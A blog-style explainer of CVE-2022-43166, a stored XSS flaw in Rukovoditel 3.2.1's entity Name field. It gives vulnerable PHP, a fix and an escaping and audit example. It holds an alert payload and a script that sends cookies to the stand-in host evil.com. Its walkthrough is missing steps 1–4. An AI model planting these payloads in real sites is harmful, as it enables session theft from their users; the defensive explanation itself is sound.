Rukovoditel is a popular open-source project management tool. While it offers handy features for teams, security researchers discovered a serious bug back in version 3.2.1. This bug — officially recognized as CVE-2022-43166 — can let hackers inject malicious scripts into the application, leading to stored XSS (Cross-Site Scripting).

In this post, we’ll explain the vulnerability, walk through a proof of concept exploit, show the relevant code, and, most importantly, help you understand how it works in simple terms. If you run Rukovoditel or similar tools, read on.

What’s the Vulnerability?

In short:
Rukovoditel v3.2.1’s “Global Entities” feature lets logged-in users add new entities. When you create a new entity, you supply a “Name”. This name gets displayed to other users — but Rukovoditel doesn’t properly sanitize this field.

So:
If an attacker puts a script in the Name field, it’ll be stored in the database and shown to anyone who views the list of entities, executing in their browser. That’s called a *stored XSS*.

Where’s the Flaw?

The issue lies in the /index.php?module=entities/entities route when adding a new entity (“Add New Entity”). The backend saves the Name as-is, and the frontend renders it without escaping special characters or stripping scripts.

Simply put:
Any script or HTML placed in the Name field ends up running in the browser of everyone who visits the entities page.

```
http:///index.php?module=entities/entities
```

5. Save/submit the new entity.
6. Now, whenever anyone accesses the “Entities” list, their browser pops up an alert showing your message — or does anything else your script wants!

Code Snippet Example (HTML Injection)

```html
<!-- Malicious Name input payload -->
<script>alert('XSS by CVE-2022-43166');</script>
```

[Image: Add New Entity page in Rukovoditel]
*Example: “Name” input is not sanitized – scripts stored in database and executed later.*

Suppose an attacker injects

```html
<!-- Stored in the Name field; runs in the browser of every viewer of the entities list -->
<script>
fetch('https://evil.com/steal?cookie=' + document.cookie)
</script>
```

Now, every time someone visits the “Entities” list, their authentication cookies are sent to the attacker’s site!

Technical Details

You can find the vulnerable endpoint here (source code from GitHub/rofisoft/rukovoditel):

```php
// handlers/entities/entities.php
$name = $_POST['name'];
// Insert $name into database without escaping
mysql_query("INSERT INTO app_entities (name) VALUES ('$name')");
```

Lack of filtering/escaping in the name field is the root cause.

Later, when the name is displayed:

```php
echo $entity['name'];
```

If `$entity['name']` contains a script tag, the browser runs it.

References

- CVE-2022-43166 (NVD)
- Exploit Database Entry
- Rukovoditel GitHub Releases
- OWASP XSS Guide

How to Fix

If you’re using Rukovoditel v3.2.1, upgrade to the latest version, where this bug is patched.

Developers: Always sanitize and escape user inputs when displaying them — especially in places like names, comments, or emails. In PHP, use:

```php
echo htmlspecialchars($entity['name'], ENT_QUOTES, 'UTF-8');
```
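To show why the `ENT_QUOTES` flag matters and how an operator can check whether malicious names are already stored, here is an added example (not Rukovoditel's own code). It goes slightly beyond the post by escaping the name in both text and attribute context, and by scanning stored rows for markup; the `$rows` array is a constructed stand-in for the `app_entities` table.

```php
<?php
// Added example, not part of Rukovoditel: context-aware output escaping
// for entity names plus a quick audit of already-stored names.

// Constructed sample rows standing in for the app_entities table.
$rows = [
    ['id' => 1, 'name' => 'Projects'],
    ['id' => 2, 'name' => "<script>alert('XSS by CVE-2022-43166');</script>"],
    ['id' => 3, 'name' => "Tasks' onmouseover='alert(1)"],
];

// Escape for HTML text content and for quoted attribute values.
// ENT_QUOTES is essential: without it a single quote passes through
// unchanged and can break out of a single-quoted attribute (row 3).
function esc(string $s): string {
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Render one row of the entities list; the name appears both as link
// text and inside a single-quoted title attribute, so both must be escaped.
function render_entity_row(array $row): string {
    $name = esc($row['name']);
    $id = (int) $row['id'];
    return "<tr><td><a href='?module=entities/entities&id={$id}'"
         . " title='{$name}'>{$name}</a></td></tr>";
}

// Audit helper: return ids of stored names that already contain markup
// or event-handler fragments, so entities created before the upgrade
// can be reviewed and cleaned.
function suspicious_names(array $rows): array {
    $hits = [];
    foreach ($rows as $row) {
        if (preg_match('/<[a-z!\/]|on\w+\s*=|javascript:/i', $row['name'])) {
            $hits[] = $row['id'];
        }
    }
    return $hits;
}

foreach ($rows as $row) {
    echo render_entity_row($row), "\n";
}
print_r(suspicious_names($rows));
```

Run against a real export of `app_entities`, the audit function points at rows worth inspecting, while the escaped rendering keeps both payloads inert on the page.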

Conclusion

CVE-2022-43166 is a classic case of stored XSS with serious consequences. Even simple web apps can run into big trouble when they trust user input. If you use Rukovoditel, update immediately. And if you build similar apps, remember: *Never trust your users!*

Stay safe out there, and keep your software updated.

*If you’d like help identifying or fixing XSS bugs in your PHP apps, drop a comment below!*

Timeline

Published on: 10/28/2022 17:15:00 UTC
Last modified on: 10/28/2022 18:52:00 UTC